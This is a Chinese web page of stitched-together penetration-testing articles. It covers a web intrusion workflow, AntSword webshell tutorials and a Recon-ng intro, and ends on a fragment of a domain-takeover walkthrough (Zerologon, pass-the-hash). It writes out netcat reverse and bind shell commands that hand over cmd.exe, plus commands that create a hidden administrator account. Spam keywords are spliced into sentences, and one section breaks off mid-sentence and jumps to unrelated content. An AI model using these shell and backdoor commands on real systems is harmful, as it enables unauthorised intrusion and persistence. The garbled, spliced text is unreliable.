1.web渗透是渗透渗透什意思什么?
2.渗透工具:蚁剑(AntSword)教学
3.渗透工具:蚁剑教学 (安装+入门)
4.web渗透信息侦察收集工具——Recon-ng
5.盘点那些渗透测试中的奇*技巧
6.域渗透之外网打点到三层内网
web渗透是什么?
Web渗透测试分为白盒测试和黑盒测试,白盒测试是源码指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。打包代码而黑盒测试则是渗透渗透什意思在对该网站系统信息不知情的情况下渗透,以下所说的源码Web渗透就是黑盒渗透。
Web渗透分为以下几个步骤,打包代码卡巴源码信息收集,渗透渗透什意思漏洞扫描,源码漏洞利用,打包代码提权,渗透渗透什意思内网渗透,源码留后门,打包代码清理痕迹。渗透渗透什意思一般的源码渗透思路就是看是否有注入漏洞,然后注入得到后台管理员账号密码,打包代码登录后台,上传小马,再通过小马上传大马,提权,内网转发,进行内网渗透,源码交易平台扫描内网c段存活主机及开放端口,看其主机有无可利用漏洞(nessus)端口(nmap)对应服务及可能存在的漏洞,对其利用(msf)拿下内网,留下后门,清理痕迹。或者看是否有上传文件的地方,上传一句话木马,再用菜刀链接,拿到数据库并可执行cmd命令,可继续上大马.........思路很多,很多时候成不成功可能就是一个思路的问题,技术可以不高,思路一定得骚。
信息收集
信息收集是整个流程的重中之重,前期信息收集的越多,Web渗透的成功率就越高。
DNS域名信息:通过url获取其真实ip,子域名(Layer子域名爆破机),旁站(K8旁站,御剑1.5),c段,手游源码网站负责人及其信息(whois查询)
整站信息:服务器操作系统、服务器类型及版本(Apache/Nginx/Tomcat/IIS)、数据库类型(Mysql/Oracle/Accees/Mqlserver)、脚本类型(php/jsp/asp/aspx)、CMS类型;
网站常见搭配为:
ASP和ASPX:ACCESS、SQLServer
PHP:MySQL、PostgreSQL
JSP:Oracle、MySQL
敏感目录信息(御剑,dirbust)
开放端口信息(nmp)
漏洞扫描
利用AWVS,AppScan,OWASP-ZAP,等可对网站进行网站漏洞的初步扫描,看其是否有可利用漏洞。
常见漏洞:
SQL注入
XSS跨站脚本
CSRF跨站请求伪造
XXE(XML外部实体注入)漏洞
SSRF(服务端请求伪造)漏洞
文件包含漏洞
文件上传漏洞
文件解析漏洞
远程代码执行漏洞
CORS跨域资源共享漏洞
越权访问漏洞
目录遍历漏洞和任意文件读取/下载漏洞
漏洞利用
用工具也好什么也好对相应漏洞进行利用
如:
Sql注入(sqlmap)
XSS(BEEF)
后台密码爆破(burp)
端口爆破(hydra)
提权
获得shell之后我们权限可能很低,因此要对自己提权,可以根据服务器版本对应的exp进行提权,对于Windows系统也可看其补丁对应漏洞的exp进行提权
内网渗透
首先进行端口转发可用nc
nc使用方法:
反向连接
在公网主机上进行监听:
nc-lvp
在内网主机上执行:
nc-e cmd.exe 公网主机ip
成功之后即可得到一个内网主机shell
正向连接
远程主机上执行:
nc-l -p -t -e cmd.exe
本地主机上执行:
nc-vv 远程主机ip
成功后,本地主机即可远程主机的一个shell
然后就是对内网进行渗透了,可以用主机漏洞扫描工具(nessus,x-scan等)进行扫描看是否有可用漏洞,可用msf进行利用,或者用nmap扫描存活主机及开放端口,可用hydra进行端口爆破或者用msf对端口对应漏洞得到shell拿下内网留后门
留后门
对于网站上传一句话木马,留下后门
对于windows用户可用hideadmin创建一个超级隐藏账户
手工:
netuser test$ /add
netlocalgroup administrators test$ /add
这样的小程序源码网话在cmd命令中看不到,但在控制面板可以看到,还需要改注册表才能实现控制版面也看不到,太过麻烦,不多赘述,所以还是用工具省心省力。
渗透工具:蚁剑(AntSword)教学
蚁剑(AntSword)是一款面向合法授权的渗透测试安全人员及网站管理员的开源跨平台WebShell管理工具。其遵循模块化开发思想和开源原则,提供易于理解、操作简便的代码和修改指南,旨在让使用者感受到人性化的、最适合自己的工具体验。
安装蚁剑分为加载器和核心模块两部分。加载器能够自动下载核心源码,源码地址可从其Github或Gitee获取。下载并解压加载器和源码至磁盘后,进入加载器目录,启动加载器,点击初始化并选择源码目录,随后选择文件夹等待初始化完成。初始化完成后,微信小程序源码即可使用。
使用蚁剑需在Web环境中运行。为搭建测试环境,推荐使用PHPStudy。在浏览器中访问PHPStudy,如遇错误,这是正常情况,个人可能已取消默认页面。
制作WebShell,蚁剑提供了官方脚本,这些脚本经过不同程度的“变异”,后续教程将详细讲解。这里使用经典的PHP一句话木马,将木马放置在站点目录下,开启浏览器访问,若返回空白并查看数据包,响应码为,说明脚本运行正常。
连接WebShell,使用蚁剑添加数据,输入连接信息并测试。测试通过后,点击添加。通过右键查看功能菜单,点击虚拟终端执行dir命令,回到主菜单后选择文件管理,双击shell.php查看内容,注意关闭位置。
总结演示了使用蚁剑连接WebShell及虚拟终端、文件管理功能,希望每位用户都能连接属于自己的专属shell。
渗透工具:蚁剑教学 (安装+入门)
蚁剑(AntSword)是一款开源的跨平台WebShell管理工具,专为合法授权的渗透测试安全人员和网站管理员设计。它遵循模块化开发思想,强调简洁和易懂,致力于提升用户体验,让更多人贡献于项目,使其成为人性化的工具。
蚁剑由加载器和核心模块两部分构成,核心源码通过加载器自动下载。下载并解压加载器和源码至磁盘后,在加载器目录启动加载器,点击初始化,选择源码目录,随后点击选择文件夹。等待初始化完成,再次打开即可使用。
使用蚁剑需具备WEB环境。利用PHPStudy搭建测试环境后,创建PHP测试站点。若访问时显示错误,属正常现象(个人可能取消了PHPstudy默认页面)。制作PHP后门时,可使用蚁剑官方提供的脚本,项目地址为:github.com/AntSwordProj...。官方脚本经过不同程度的“变异”,后续教程中将逐步讲解。使用经典PHP一句话木马,放置在站点目录下,通过浏览器访问,响应码为,表示脚本正常运行。
连接WebShell使用蚁剑,打开添加数据界面,填写连接信息后点击测试。测试成功后,点击添加,选中连接项右键查看功能菜单,点击虚拟终端,执行dir命令。返回主菜单,选择文件管理,双击shell.php查看内容,注意关闭的位置。
演示了如何使用蚁剑连接webshell及虚拟终端、文件管理功能,希望每位用户都能成功连接专属shell,享受高效便捷的管理体验。
web渗透信息侦察收集工具——Recon-ng
在web渗透测试领域,信息侦察与收集是至关重要的环节。对于经验丰富的黑客而言,他们有自己独特的信息收集策略。在信息收集的过程中,合理利用现有的优秀工具,尤其是对新手而言,能极大提升效率与效果。本文将聚焦于一款新型的信息侦察收集工具——Recon-ng,分享其安装与使用方法。
Recon-ng的安装步骤简单明了。首先,确保已安装dnspython、 view查看域内主机,使用hashdump抓取用户hash值,获取域控IP地址和计算机名。编译并测试zerolgin脚本,将其设置为空密码。配置kali代理,获取域控hash值并登录,关闭防火墙使用pth上线cs,生成tcp监听后jump到域控主机,成功恢复密码并获取hash值。
项目涉及环境搭建、信息收集、工具利用、手写exp、外网打点、内网穿透、内网渗透、域渗透等全面技术,是一次从外网到内网、再到域控的完整渗透测试演练。尽管靶机未安装杀软,但此过程展示了从外网到内网、再到域控的广泛知识和技能。